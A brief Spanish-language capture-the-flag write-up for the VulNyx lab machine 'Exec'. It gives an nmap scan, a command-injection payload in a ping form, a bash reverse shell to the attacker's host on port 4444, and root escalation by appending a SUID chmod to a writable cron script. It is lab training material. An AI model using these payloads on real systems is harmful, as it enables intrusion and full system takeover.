vulnyx muy-facil Linux

Exec

12 Apr 2026

#command-injection #lfi #cron #privesc

Reconocimiento

nmap -sV -sC -p- --min-rate 5000 192.168.1.X

Puertos: 22 (SSH), 80 (HTTP).

Panel de administración en /admin/ con función de ping:

http://192.168.1.X/admin/ping.php?ip=127.0.0.1

ip=127.0.0.1;id

Respuesta: uid=33(www-data). Confirmada la inyección. Lanzamos reverse shell:

ip=127.0.0.1;bash -c 'bash -i >& /dev/tcp/192.168.1.Y/4444 0>&1'

cat /etc/crontab

* * * * * root /opt/backup.sh

El script es escribible por www-data:

echo 'chmod +s /bin/bash' >> /opt/backup.sh
# Esperar 1 minuto...
bash -p

bash-5.1# whoami
root